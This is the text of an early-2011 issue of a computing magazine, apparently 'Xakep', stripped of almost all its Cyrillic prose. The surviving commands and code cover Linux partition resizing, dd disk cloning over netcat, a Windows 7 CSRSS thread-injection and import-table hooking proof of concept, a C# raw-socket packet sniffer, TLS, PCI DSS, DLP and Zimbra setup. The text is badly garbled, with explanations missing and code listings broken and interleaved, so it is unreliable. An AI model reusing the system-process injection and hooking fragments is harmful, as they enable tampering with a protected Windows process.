, , .
:
gparted, parted,
.
, ,
.
parted. - :
$ sudo apt-get install parted
/home:
$ sudo telinit 1
# umount /home
/home
Linux , LiveCD parted. SystemRescueCD (www.sysresccd.
org,
DVD) .
parted :
$ sudo parted /dev/sda
print,
.
( ),
,
(
, , , 62,9GB).
resize _.
Start
<Enter>, End ,
X 01 (144) 2011
2010 , 63
(,
62,8GB). quit
.
. ,
,
LiveCD parted
.
fdisk resize2fs e2fsprogs (
Ext2, Ext3 Ext4). LiveCD, :
# fdisk -l
/
home. , ,
fsck /home (
/dev/sda7)
# fsck -n /dev/sda7
/dev/sda7
, . fdisk:
# fdisk /dev/sda
'd' ( ) (/dev/sda7 =
7).
'n', 'l' ( ).
,
fdisk -l. <Enter> ( fdisk
, ). 'p',
,
'w'. LiveCD.
:
# fsck -f /dev/sda7
resize2fs ,
:
# resize2fs /dev/sda7
:
# fsck -n /dev/sda7
# reboot
X 01 (144) 2011
UUID
.
,
,
,
. ,
, .
,
.
Linux
: unionfs, aufs2 mhddfs.
, ,
, aufs2
. mhddfs (Multi-HDD FileSystem, mhddfs.
uvw.ru) fuse- ,
,
.
,
, . ,
,
(
).
/mnt/disk1, /mnt/disk2 /mnt/disk3,
Music. :
/home/vasya/Music. unionfs :
INFO
info
fstab
Ubuntu
UUID,
blkid:
$ sudo blkid /dev/sda1
dd
,
:
$ sudo watch
-n60 killall
-SIGUSR1 dd
aufs2 :
$ sudo mount -t aufs none /home/vasya/Music -o
br:/mnt/disk1/Music=rw:/mnt/disk2/Music=rw:/
mnt/disk3/Music=rw,create=mfs,sum
mhddfs :
$ sudo apt-get install mhddfs
$ sudo mhddfs /mnt/disk1/Music,/mnt/disk2/
Music,/mnt/disk3/Music /home/vasya/Music -o
mlimit=10G
101
UNIXOID
NTFS-
1. ntfsprogs:
$ sudo apt-get install ntfsprogs
2. NTFS-:
$ sudo umount /dev/sda1
GParted
, . ( mfs)
,
.
, 10
, ,
.
,
/etc/fstab:
none /home/vasya/Music aufs br:/mnt/disk1/Music=rw:/
mnt/disk2/Music=rw:/mnt/disk3/Music,create=mfs,sum 0 0
,
,
? , Linux , .
:
, / (
).
, Ubuntu 10.10. , ,
.
:
1. LiveCD.
2. , .
Ubuntu ( swap), :
/home. (
cfdisk gparted ) swap.
.
3.
(/dev/sda , /dev/sdb ):
#
#
#
#
#
mkdir
mount
mount
mount
mount
/mnt/{root1,root2,home1,home2}
/dev/sda1 /mnt/root1
/dev/sdb1 /mnt/root2
/dev/sda2 /mnt/home1
/dev/sdb2 /mnt/home2
.
4. :
# cp -ax /mnt/root1/* /mnt/root2
# cp -ax /mnt/home1/* /mnt/home2
102
3. :
$ sudo ntfsresize -s 10000M /dev/sda1
4. fdisk NTFS-
10000 ;
5. Windows
.
# vi /etc/fstab
/dev/sda1 / ext4 errors=remount-ro 0 1
/dev/sda2 /home ext4 defaults 0 2
/dev/sda3 none swap sw 0 0
8. exit chroot, ,
, , .
,
,
. dd:
# dd if=/dev/sda of=/dev/sdb bs=4k
,
,
,
, . , dd
.
2010
Western Digital,
512 4 ( Advanced
Format). , ,
.
, , Linux, BSD WinXP/
Win2k3, ,
( 3-/4-
).
WD : Windows- WD Align,
512 (
)
;
,
X 01 (144) 2011
Grub2
- :
# dd if=/dev/sda bs=4k | netcat < IP- > 1234
-:
# netcat -l -p 1234 | dd of=/dev/sdb bs=4k
dd
,
dd, ( , ):
# mount /dev/sda1 /mnt
# dd if=/dev/zero of=/mnt/zero bs=4k
# rm -f /mnt/zero
512- ,
, .
, Linux, , ,
. ,
, ,
cfdisk.
64 . fdisk '-u':
# fdisk -u /dev/sdb
'n' ( ), 'p' ( ),
'1' ( ),
64,
( ,
512).
'w'. :
# mkfs.ext4 /dev/sdb1
# mount /dev/sdb1 /mnt
,
. ,
,
X 01 (144) 2011
WD , , WinXP
, .
.
. ,
63
( , 20
, ,
).
, ,
. cfdisk
,
parted "--align optimal",
.
, , , , ,
. ,
, . z
103
CODING
stann ic.man@gmail.com
CSRSS
, Windows 7
: Windows, Microsoft ,
.
, ,
!
, , ,
- CSRSS,
,
, . ,
, .
, , Nimda. , ,
CSRSS , CSRSS ,
. ,
.
104
, .
(!) BSOD, Windows,
: 0x0000004C (FATAL_UNHANDLED_HARD_
ERROR) 0xC000021A (STATUS_SYSTEM_PROCESS_TERMINATED)
(winlogon.exe
csrss.exe). Windows
. , , csrss.exe (
, ),
, (
).
CSRSS ,
, , :
%SystemRoot%\system32\csrss.exe ObjectDirectory=\
Windows SharedSection=1024,3072,512 Windows=On
SubSystemType=Windows ServerDll=basesrv,1 ServerDll
=winsrv:UserServerDllInitialization,3 ServerDll=win
srv:ConServerDllInitialization,2 ProfileControl=Off
MaxRequestThreads=16
X 01 (144) 2011
>> coding
, kernel32!CreateProcess,
kernel32!AllocConsole, kernel32!FreeConsole,
user32!EndTask .
IDA, ,
, CsrClientCallServer, - ,
:
.text:77E96D55
.text:77E96D57
//
.text:77E96D5C
.text:77E96D5F
.text:77E96D61
.text:77E96D67
.text:77E96D68
,
,
, CSRSS.
,
CsrApiRequestThread, csrss.exe,
.
CSRSS .
CsrApi ? .
, , CSRSS
Windows.
X 01 (144) 2011
links
MSDN
,
99%
,
WinAPI.
DVD
dvd
-
.
CsrClientCallServer
!
CsrApi- CsrClientCallServer.
PUSH 4
PUSH 20225h
HTTP://WWW
105
CODING
,
CsrApi- , .
, CSRSS? , . , Windows 7.
, Windows 7
CreateRemoteThread . ,
, Microsoft ,
. CreateRemoteThread ,
, NULL
ERROR_NOT_ENOUGH_MEMORY.
:).
, RtlCreateUserThread (
: http://forum.gamedeception.net/threads/17097-Simpleinjector-(cmd-line-unicode-xp-vista-w7)),
; .
CSRSS,
status quo
. PoC . ,
CreateRemoteThread
CsrClientCallServer, . ,
. CreateRemoteThread NtCreateThreadEx,
CREATE_SUSPENDED,
CSRSS
CsrClientCallServer. ?
:) , , CsrClientCallServer
. .
kernelbase.dll ( kernel32.dll Windows 7, ):
kernelbase.dll
.text:7597BD24
.text:7597BD26
.text:7597BD2B
.text:7597BD2C
.text:7597BD32
.text:7597BD33
.text:7597BD39
.text:7597BD3F
.text:7597BD45
.text:7597BD4B
}
...
DWORD ImportAddress;
DWORD OriginalCsrClientCallServer, OldProtect;
ImportAddress = GetImportAddressFromIat(
GetModuleHandle("kernelbase.dll"),
"CsrClientCallServer");
VirtualProtect(( VOID *) ImportAddress,
sizeof(DWORD),
PAGE_EXECUTE_READWRITE,
&OldProtect);
OriginalCsrClientCallServer =
*(DWORD*)ImportAddress;
*(DWORD*)ImportAddress =
(DWORD)NewCsrClientCallServer;
...
PUSH 0C
PUSH 10001
PUSH EBX
LEA EAX, DWORD PTR SS:[EBP-210]
PUSH EAX
CALL NEAR DWORD PTR
DS:[<&ntdll.CsrClientCallServer>]
; ntdll.CsrClientCallServer
MOV EAX, DWORD PTR SS:[EBP-1F0]
MOV DWORD PTR SS:[EBP-218], EAX
CMP DWORD PTR SS:[EBP-218], EBX
JL KERNELBA.75999564
kernelbase.dll,
, CsrClientCallServer
CsrClientCallServer,
. . :
ULONG NewCsrClientCallServer(
PVOID Arg1,
PVOID Arg2,
ULONG Arg3,
ULONG Arg4)
{
106
if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME,
&tokenPrvlgs.Privileges[0].Luid))
return error;
tokenPrvlgs.PrivilegeCount = 1;
tokenPrvlgs.Privileges[0].Attributes =
SE_PRIVILEGE_ENABLED;
if(!AdjustTokenPrivileges(hToken, FALSE,
&tokenPrvlgs, 0, NULL, NULL))
{
return error;
}
CloseHandle( hToken );
return success;
}
, . Windows 7,
. , ,
, . , !
P.S. CSRSS!
:). z
X 01 (144) 2011
>> coding
WEXLER.HOME 902
, ,
.
, .
, , . ?
? , !
. . WEXLER.
HOME 902 ,
.
,
.
. WEXLER.HOME 902 700 ,
.
WEXLER.HOME 902
Windows 7 .
64- :
12 . , Microsoft Office
Microsoft Security Essentials. World of Tanks, 4099 .
,
, .
: www.wexler.ru
CODING
seva@vingrad.ru
GUI
Mac OS X
Mac OS X Objective-C
Cocoa. , ,
.
GUI- Cocoa Objective-C.
Code
, XCode,
Mac OS X Apple. ,
: , ,
..
Interface Builder.
, XCode 4 Interface Builder
, - ,
XCode Apple Interface Builder
IDE, , .
, XCode 4 ( ,
.. , . .) ,
108
, . , ,
, :
, , , ,
.., ..
X 01 (144) 2011
>> coding
Cocoa
MainMenu.xib Interface Builder
,
XCode , , . ,
IDE. , , command-line , , , kext,
iOS.
XCode
. , , , .
XCode ( XCode ,
Apple).
, , File
New Project. ,
. Cocoa Application ,
Cocoa.
, , XCode
.
:
#import <Cocoa/Cocoa.h>
int main(int argc, char * argv[])
{
return NSAppliction(argc, (const char**) argv);
}
NSApplication.
. (
)
.
(Build Build and
Go), . ?
? .
- NIB Files ( -, NIB Files
Interface Buildera) MainMenu.xib.
Interface Builder,
, Mac OS
X .
. IB .
X 01 (144) 2011
,
. Tools Library (,
, XCode, Interface Builder)
,
drag-and-drop.
, .
,
. -
:).
(Tools
Inspector). ,
.
.
, . , , ,
Interface Builder. ?
, ,
? -
... .
- .
.
XCode ( , Interface
Builder?) AppConroller (File New
File Cocoa Objective-C class). XCode
AppController.h AppController.m . Interface Builder
AppController ,
AppController.
AppController.h InterfaceBuilder.
. - - . ! ,
. Interface Builder Tools Library
Object .
,
AppController.
MainMenu.xib,
, , ,
.
, ,
, .
109
CODING
AppController
//
// Cocoa.h
#import <Cocoa/Cocoa.h>
@interface AppController : NSObject
{
// .
//
// .
IBOutlet NSTextField * FirstNumber;
IBOutlet NSTextField * SecondNumber;
IBOutlet NSTextField * Result;
}
//
//
- (IBAction) buttonClick: (id) sender;
@end
//
#import AppController.h
@implementation AppController
//
- (IBAction) buttonClick: (id) sender
{
//
//
[Result setIntValue:
[FirstNumber intValue] +
[SecondNumber intValue]];
}
@end
IBOutlet IBAction,
, . , ,
Interface Builder Outlet ( ) Interface
Builder Action , GUI. , ,
Interface Builder. :
. AppController
InterfaceBuilder;
. ,
IBAction .
, - .
110
,
2D-,
-
Build and Go (. ).
, : Cocoa
, , ,
. (
).
, ,
. , ? -
? , :).
Mac OS X , ,
Cocoa.
Mac OS X Quarz. , 2D-,
-, NSView.
drawRect .
XCode MyView.h MyView.m .
MyView.h
Interface Builder. Library
CustomView, MyView .
(
).
.
- , -.
(path) .
Cocoa- NSBezierPath (. ).
, GUI Cocoa-.
iOS iPhone iPad
,
, . ! z
X 01 (144) 2011
>> coding
It works!
MyView
//
// XCode
// .
#import "MyView.h"
@implementation MyView
// XCode
// :)
- (id)initWithFrame:(NSRect)frame {
self = [super initWithFrame:frame];
if (self) {
// Initialization code here.
}
return self;
}
//
//
// 2D-
- (void)drawRect:(NSRect)rect
{
//
[[NSColor grayColor] set];
//
NSRectFill( rect );
//
[black_side appendBezierPathWithArcWithCenter:
center
radius: radius
startAngle: 90
endAngle: 270
clockwise: YES];
//
NSBezierPath * circle =
[NSBezierPath bezierPathWithOvalInRect: rect];
//
[circle setLineWidth: 2.0];
//
[[NSColor whiteColor] set];
[circle fill];
//
[[NSColor blackColor] set];
//
[circle stroke];
// ;
// c ,
float center_x = rect.size.width / 2.0;
float center_y = rect.size.height / 2.0;
NSPoint center = {center_x, center_y};
NSPoint center_up = {center_x, center_y * 0.5};
NSPoint center_dn = {center_x, center_y * 1.5};
float radius =
X 01 (144) 2011
//
[black_side appendBezierPathWithArcWithCenter:
center_up
radius: radius / 2
startAngle: 270
endAngle: 90
clockwise: NO];
//
[black_side appendBezierPathWithArcWithCenter:
center_dn
radius: radius / 2
startAngle: 270
endAngle: 90
clockwise: YES];
//
[[NSColor blackColor] set];
[black_side fill];
//
[[NSBezierPath bezierPathWithOvalInRect:
NSMakeRect(center_x - radius / 6.0,
center_y - radius * (0.5 + 1/6.0),
radius / 3.0, radius/3.0)] fill];
//
[[NSColor whiteColor] set];
[[NSBezierPath bezierPathWithOvalInRect:
NSMakeRect(center_x - radius / 6.0,
center_y + radius * (0.5 - 1/6.0),
radius / 3.0, radius/3.0)] fill];
}
@end
111
CODING
c0n Difesa condifesa@gmail.com, http://defec.ru
(, ),
- ( ),
. +
,
.
, .
, , Wireshark: ,
TCP-,
,
. ,
, CommView.
, , ,
. Wireshark
PCAP (Packet Capture),
. ,
, .
112
CommView,
NDIS-,
.
,
, .
,
. ,
- , ,
, .
. ,
, -
X 01 (144) 2011
>> coding
, ,
,
, ,
.
.
,
,
,
.
,
,
, .
,
, , ,
-
, , . ,
. ,
, ,
.
, ,
, .
+ = ?
.
-, , :
;
X 01 (144) 2011
(
PCAP );
( );
- ;
;
,
.
(
,
, ).
,
.
-, ,
-
,
. ,
, -
, .
, , -,
,
.
.
HTTP://WWW
links
http://defec.ru/wtf_wcf
Windows
Communication
Foundation:
.
www.xakep.ru/
post/16494/
PCAP.
www.codeproject.
com/KB/IP/
CSNetworkSniffer.aspx
(.) C#.
www.xakep.
ru/magazine/
xa/135/096/1.asp
,
.NET Remoting.
Windows
Communication Foundation, .NET Framework ( WCF
WTF WCF?! Windows Communication Foundation:
).
, C#.
,
DVD
dvd
.NET Remoting.
113
CODING
IPv4 Header
IP-
.
IP-, IOControl
ReceiveAll,
,
.
, .
:
TCP;
UDP;
IP;
DNS.
, HTTP, SMTP, FTP TCP, , ,
IP: ,
,
.
(raw socket), -
114
// raw-
mainSocket = new Socket(
AddressFamily.InterNetwork,
SocketType.Raw, ProtocolType.IP);
// IP-
mainSocket.Bind(newIPEndPoint(
IPAddress.Parse(cmbInterfaces.Text),0));
/* IP-
*/
mainSocket.SetSocketOption(
SocketOptionLevel.IP,
SocketOptionName.HeaderIncluded,
true);
mainSocket.IOControl(
IOControlCode.ReceiveAll,
byTrue,// ,
byOut);// ,
//
mainSocket.BeginReceive(byteData, 0,
byteData.Length, SocketFlags.None,
newAsyncCallback(OnReceive), null);
/* ,
*/
X 01 (144) 2011
>> coding
AddTreeNode addTreeNode =
new AddTreeNode(OnAddTreeNode);
()
(-)
}
}
TCP
UDP: , IP-.
,
- , ( ,
RFC).
, .
(,
) ,
, , ,
,
. . ,
:
/* ,
, IP-*/
private TreeNode MakeIPTreeNode(IPHeader ipHeader)
{
//
TreeNode ipNode = new TreeNode();
//
return ipNode;
}
:
X 01 (144) 2011
.
- .NET Remoting.
.
, -,
,
:
/*
*/
RemotingConfiguration.Configure("Client.exe.txt");
//
Test test = new Test();
//
test.SendLog(rootNode);
, SendLog()
, , rootNode.
, Result,
:
public void SendLog(string SensorLog)
{
//
Result = Result + SensorLog;
}
,
, Result .
//
test.Show()
Show() ,
Result .
Show() :
,
(, ) ,
.
? , !
(,
! -, :) ..)
: ,
, , - ,
.
, ,
, ,
.
, ! z
115
CODING
deeonis deeonis@gmail. com
TLS
, ,
, .
.
, ...
.
,
.
? .
strtok C++.
, , .
. ,
strtok ,
.
,
,
,
.
.
, .
,
.
//
int tls_i;
char tls_char[25];
//
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
//
tls_i = (int)lpParam;
lstrcpy(tls_char,"array of char");
char szMsg[80];
wsprintf( szMsg, "Parameter = %d.", tls_i );
MessageBox( NULL, szMsg, "ThreadFunc", MB_OK );
return 0;
}
int APIENTRY WinMain(
116
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwThreadId;
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)1, 0, &dwThreadId);
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)2, 0, &dwThreadId);
Sleep(10000);
// 10
return 0;
}
, .
/
.
. ,
, ,
,
thread-local storage (TLS).
thread-local storage?
TLS
. ,
, ,
. ,
. , .
DLL, ,
.
.
TLS : .
X 01 (144) 2011
TLS (TLS_MINIMUM_AVAILABLE - 1)
0
0
TLS_MINIMUM_AVAILABLE - 2)
TLS_MINIMUM_AVAILABLE - 1)
0
0
TLS_MINIMUM_AVAILABLE - 2
TLS_MINIMUM_AVAILABLE - 1)
,
.
.
, TlsGetValue
, . : PVOID TlsGetValue(DWORD
dwTlsIndex). TlsSetValue, TlsGetValue
dwTlsIndex , TlsAlloc.
, , TlsFree. ,
, , TlsAlloc. API ,
.
TLS
, .
WinMain TlsAlloc,
PVOID. ,
TLS , , , .
TlsFree.
TLS
// TLS
DWORD tls_i;
DWORD tls_char;
//
DWORD WINAPI ThreadFunc( LPVOID lpParam )
117
CODING
{
TlsSetValue(tls_i, lpParam);
char *char_buf = new char[25];
lstrcpy(char_buf,"array of char");
TlsSetValue(tls_char, char_buf);
char szMsg[80];
int i = TlsGetValue(tls_i);
wsprintf( szMsg, "Parameter = %d.", i );
TLS
// TLS-
__declspec(thread) int tls_i;
__declspec(thread) char tls_char[25];
//
DWORD WINAPI ThreadFunc(
LPVOID lpParam )
{
tls_i = (int)lpParam;
lstrcpy(tls_char,"array of char");
return 0;
}
return 0;
int APIENTRY WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwThreadId;
tls_i = TlsAlloc();
tls_char = TlsAlloc();
}
int APIENTRY WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
DWORD dwThreadId;
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)1, 0, &dwThreadId);
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)1, 0, &dwThreadId);
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)2, 0, &dwThreadId);
CreateThread(NULL, 0, ThreadFunc,
(LPVOID)2, 0, &dwThreadId);
Sleep(10000);
// 10
Sleep(10000);
// 10
TlsFree(tls_i);
TlsFree(tls_char);
return 0;
}
,
, ,
, .
TLS-.
thread-local storage
TLS
. thread-local
storage .
PE-, .tls
( ), ,
. TLS,
, , .
,
API thread-local storage,
C++. .
118
return 0;
}
__declspec(thread),
TLS-.
, , ,
WinAPI.
, . tls_char
, TLS,
CHAR. ,
(1088 Windows XP), , tls_char , 25 threadlocal storage. ,
dll, , , TLS.
, ,
. TLS
,
.
, TLS
.
,
thread-local storage . z
X 01 (144) 2011
E-INK
, ,
. 7-8 , , ,
. ? ? Wexler Wexler Book T7001, 4-
!
Wexler Book
T7001
7- TFT-.
E-Ink,
,
Wexler
:
,
.
, ,
DVD-RIP.
4 ,
MicroSD ( 16
)
.
, FM-
.
: TXT, PDF, FB2, RTF, EPUB, HTML
: AVI, Xvid, Divx 4/5, RM, RMVB, FLV, KV
: JPG, BMP, GIF
: MP3, WMA, APE, FLAC, AAC
: , FM-,
: 200x132x13
: 300
: www.wexler.ru
3990 .
,
5 ,
7 .
6 .
.
PDF.
.
.
SYN/ACK
c0n Difesa condifesa@gmail.com, http://defec.ru
PCI DSS
(PCI DSS) ,
.
?
, .
: -, -
, .
, ,
.
-,
.
,
, .
, , -
-
- (). , ,
().
,
, , .
(Payment
Card Industry Security Standards Council, PCI SSC),
(Visa, MasterCard, American
Express, Discover, JCB), ,
(Payment Card Industry
Data Security Standard, PCI DSS).
.
. , , ,
,
. PCI DSS, ,
,
.
:
,
120
, .
- , ,
.
PCI DSS
,
, ,
,
,
, . ,
PCI DSS
, ,
, .
:
1. (Glossary);
2. (Payment
Card Industry Data Security Standard);
3. (PCI
DSS Security Audit Procedures);
4. (PCI DSS Security Scanning
Procedures);
5. , QSA- (PCI DSS Validation
Requirements for Qualified Security Assessors);
6. , (PCI DSS
Validation Requirements for Approved Scanning Vendors);
7. PCI DSS (Navigating PCI DSS Document);
8. PCI DSS
(Prioritized Approach for PCI DSS);
9. (PCI DSS Self-Assessment Questionnaire);
10. (
, ).
, , ,
, ,
.
PCI DSS, ,
, X 01 (144) 2011
, ,
.
. 7-9
( ) , ,
, (
-) :
PCI DSS( 7)
12 PCI DSS ( 1)
, ;
( 8) ,
, ,
, , ,
.
PCI DSS ,
, -
,
,
.
( 1-6
) , ,
, QSA.
PCI DSS
.
-
, . , ,
, ,
, ,
, , X 01 (144) 2011
,
,
. , ,
,
.
PCI DSS,
, (PAN).
,
, .
, ,
PAN ,
, .
,
, , , CVV2
(Card Verification Value 2
Visa) CVC2 (
MasterCard)
, , . , , -
-.
PCI DSS (,
, -)
, CVC2
CVV2 online-.
,
, PCI DSS,
, ,
.
, , -
HTTP://WWW
links
http://pcidss.ru/
articles/22.html
2.0
PCI DSS.
https://www.
pcisecuritystandards.
org/security_
standards/
documents.php
PCI DSS
v2.0 .
http://www.xakep.ru/
post/49549/ :
PCI
DSS.
.
121
SYN/ACK
Payment Card
Industry (PCI) Data
Security Standard
,
PCI DSS
Glossary
Navigating PCI
DSS Document
PCI DSS
Prioritized
Approach for PCI
DSS
- ,
, .
. ,
.
-
, .
PCI DSS , ( )
( ).
, ,
.
PCI DSS , ,
.
:
1. ,
, ;
2.
;
3. - ,
( ) .
122
( 1 2). ,
, , . : .
. ,
.
( ),
1.4,
(
) , ,
. :
, ,
, .
,
. , 2.2.4,
: , , , , ,
-. ,
,
.
(
3 4) (, ..) ,
,
X 01 (144) 2011
3.4
PCI DSS
CAV2/CVC2/CVV2/CID
(PAN)
(ardholder Name)
(Service Code)
(Expiration Date)
,
,
.
. ,
( -
),
,
. ,
,
(,
),
,
.
, 5 6,
. ,
, :
,
,
,
-. ,
,
, -
11.
(7, 8 9)
-
,
.
, ,
. -
.
X 01 (144) 2011
. , , ASV,
. , ,
PCI DSS ASV-
( 11.2 11.3) ,
.
,
, , ,
,
.
12 :
,
- . 12.1.1
, PCI
DSS. - -,
, , ,
,
.
-
.
INFO
info
(PCI DSS v2.0 28
2010 )
.
.
WARNING
warning
PCI DSS v1.2.
. ,
,
.
,
,
,
,
PCI DSS.z
123
SYN/ACK
luchnik@it-university.ru
, . ,
.
,
. , ,
, DRM (DigitalRightsManagement,
DigitalRestrictionsManagement).
( ,
, )
:
EDRM Enterprise Digital Rights Management
ERM Enterprise Rights Management
IRM Information Rights Management
RMS Rights Management Services, Microsoft IRM
.
. ,
, , ,
,
. ,
, :
,
e-mail
;
, ,
, , .
DLP (DataLeakage
(Loss)Prevention) , .
124
DLP IRM
?
, , DLP
IRM. (IBM, Cisco, RSA ( EMC), Oracle, Microsoft, CheckPoint, Symantec)
.
,
. ,
,
.
DLP- :
Data-at-Rest. , , , . ,
, .
Data-in-Motion. (, , ) ,
.
Data-in-Use. , ,
.
DLP-
. , ,
,
-. ,
. DLP- ,
.
, , (,
), ,
,
, .
,
X 01 (144) 2011
2.
AD RMS.
, DLP-
.
, ,
, . , , .
-, , ,
, , .
DLP- . , , . ,
//
, DLP-, . .
, ,
, , , ,
. DLP-
.
, , , ,
? IRM-.
IRM . , . DRM,
, IRM
, . IRM
.
DLP IRM . DLP
,
X 01 (144) 2011
. DLP ,
.
,
IRM.
AD RMS?
125
SYN/ACK
4. WatchDox
3. AD RMS
1. ,
AD RMS
CAD- .
ADRMS
Software Development Kit (SDK),
,
ADRMS.
ADRMS
, , , . 1
. 2
, :
126
DRM-. SaaS Watchdox
Confidela,
AmazonWebServices. Watch Dox Secure file sharing
www.watchdox.com,
(View, Print, Edit, Forward, Spotlight Copy/Paste),
.
.
-, ,
. ,
, , ,
.
e-mail, .
,
. ,
e-mail.
HTTPS, AES.
, ,
,
(. 4). Spotlight,
,
.
, , ,
.
,
e-mail, ( e-mail ,
,
Confidela
).
5. , .
, use license,
(, ).
6. ,
, , , .
ADRMS
ADRMS :
Active Directory Domain Services (ADDS)
URL AD RMS Service Connection Point (SCP)
. AD RMS
.
Microsoft SQL Server , Windows
Server 2008.
, AD
RMS, Web Server (IIS).
X 01 (144) 2011
technet.microsoft.com/en-us/library/dd772697(WS.10).aspx
.
www.xrml.org eXtensible Rights Markup Language ,
ADRMS.
DRL-
IRM- : DLP- (www.bytemag.ru/articles/detail.
php?ID=16748), GroupTest: DRM & DLP tools (www.scmagazineus.
com/grouptest-drm--dlp-tools/printgrouptest/182/), DLP (www.cnews.ru/reviews/free/
security2009/articles/dpl.shtml).
DLP- IRM- ,
.
, ,
. AD RMS,
,
IRM- ,
, ,
. , AD
RMS DLP-, ,
RSADLP..z
127
SYN/ACK
grinder grinder@ua.fm, tux.in.ua
Zimbra:
must have
.
, , .
Zimbra Collaboration Suite (ZCS), ,
.
ZCS
Zimbra Inc.
2007 , .
OpenSource , ,
. 2007
Yahoo!, 2010 VMware.
Zimbra ,
. ,
POP/POPS IMAP/
IMAPS -.
ClamAV. ,
,
,
Zimbra. ,
Zimbra,
.
Zimbra
(Jabber), ,
,
WYSIWYG Zimbra Document.
RTF, HTML, ,
. , Zimbra Document
, .
.
,
( URL).
e-mail RSS/Atom.
, e-mail. -
128
, , .
Zimbra
(Windows Mobile, iPhone, Nokia E ), - , .
,
LDAP , ActiveDirectory.
API,
zimlets Zimbra.
ZCS ,
, ,
. Zimbra .
, .
-
. Zimbra Server Java,
POP3/IMAP , OpenSource ,
nginx, Apache Lucene, OpenLDAP, MySQL, Postfix, POP3/
IMAP4 Perdition, ClamAV, DSPAM .
- Zimbra Web Client ,
-
.
AJAX,
. , ,
,
, ,
Skype Ekiga,
.
, , Zimbra Desktop, (, , ),
X 01 (144) 2011
IMAP/POP3 .
ZCS : Open Source Edition,
Network Edition (Starter, Standard Professional) Zimbra
Appliance (Basic, Standard).
OpenSource- ZPL
(Zimbra Public License).
,
,
Zimbra
.
,
MS Outlook, ,
(. zimbra.com/
products/compare_products.html).
, "" OpenSource
.
, Wiki
, Zimbra.
Open Source Edition .
ZCS OpenSource
Edition
6.0.8, Ubuntu
10.04 LTS. 32 x64
Linux (Red Hat Enterprise, Fedora, Ubuntu, Debian,
Mandriva, SUSE Linux) Mac OS X.
. Ubuntu
6.06 8.04 LTS,
10.04 -
. ,
X 01 (144) 2011
.
DNS , A MX
.
, 10 .
, .
64- .
$ wget -c http://files2.zimbra.com/
downloads/6.0.8_GA/zcs-6.0.8_GA_2661.
UBUNTU8_64.20100820044710.tgz
.
$ tar xzvf zcs-6.0.8_GA_2661.
UBUNTU8_64.20100820044710.tgz
$ cd zcs-6.0.8_GA_2661.
UBUNTU8_64.20100820044710
HTTP://WWW
links
Zimbra
zimbra.com
Zimbra
zimbra.com/products/
compare_products.
html
wiki.zimbra.com/wiki/
User_Migration
INFO
$ ./install.sh --platform-override
Zimbra, .
/etc/hosts
.
, .
- ,
MISSING, . ,
.
info
Zimbra: 22, 25, 80,
110, 143, 389, 443, 993,
995, 7025.
129
SYN/ACK
-
$ sudo apt-get install libpcre3 libgmp3c2 libgmp3-dev
sysstat libexpat1 wget
,
(
11). ,
zimbra-memcached zimbra-proxy ( POP3, IMAP
HTTP). , zimbra-proxy, memcached .
. ,
. DNS
Zimbra, (A MX) /etc/hosts, .
,
. , ,
. Admin
Password, .
.
, 3, ,
Admin Password ( ***),
. , r, s a (
) q.
. ,
/opt/zimbra/log.
Zimbra , . :
$ ./install.sh --uninstall
/opt/zimbra, .
- Zimbra
.
, URL
. ,
(HTML), (AJAX) . , AJAX, , .
,
.
, , , ,
130
. ,
. , -
,
. - Zimbra
, .
- 7071 .
https://server.com:7071,
admin .
,
.
:
, ,
,
;
, , (, )
, zemlets
, ;
( , ,
CPU,
);
, ;
(,
, ).
,
,
, - .
,
, .
, wiki -.
.
CSV,
. ,
, . :
user@domain.com,name,password
, ,
.
X 01 (144) 2011
, .
, .. Zimbra .
, - to Zimbra migration.
Zimlet, .
.
, default
,
, .
,
. (
).
.
, ,
. .
. ,
.
, ,
, MTA, POP, IMAP, Exchange
.
, :
, .
.
6 zimlets.
/opt/zimbra/zimlets*.
, Zimlets,
zip .
zimlets ( )
. .
Zimbra
-, Zimbra ,
zimbra.
Zimbra CLI
Commands (zimbra.com/docs/os/6.0.8/administration_guide).
service zimbra status
zmcontrol.
zmcontrol (status | stop | start | maintenance | startup)
. ,
-H .
zmaccts , zmprov
LDAP,
,
.
.
Wiki- (wiki.zimbra.com/wiki/User_Migration).
.
. ,
. default,
Zimbra.
, , .
7 , , (HTML AJAX), ,
, ,
X 01 (144) 2011
, ,
, ,
.
, *nix .
.z
131
!
800 !
8.5
DVD
191
2200
23%
30 ,
31 ,
31 .
C !
. 46
""?
TOYOTA CELICA LEXUS IS-F LEXUS IS TOYOTA SUPRA
MITSUBISHI LEGNUM -21123 ACURA SLX BMW Z4
MITSUBISHI LANCER MERCEDES S-CLASS SUBARU IMPREZA
FORD CAPRI
SEAT EXEO
AUDI A4?
FORNASARI
09 (96) 2010
. 14
-
-
56
NOKIA N8
WWW.T3.RU
10 (10 5) 2 010
. 3 8
?
. 9 2
. 6 0
www.photo-mast.ru
11 (66) 2010 //
SAMSUNG
PS3
MAMM
iPAD?
BLACKBERRY
TORCH
XBOX
132
. 36
HOMEFRONT
+ DVD
DVDXpert
nj}p
n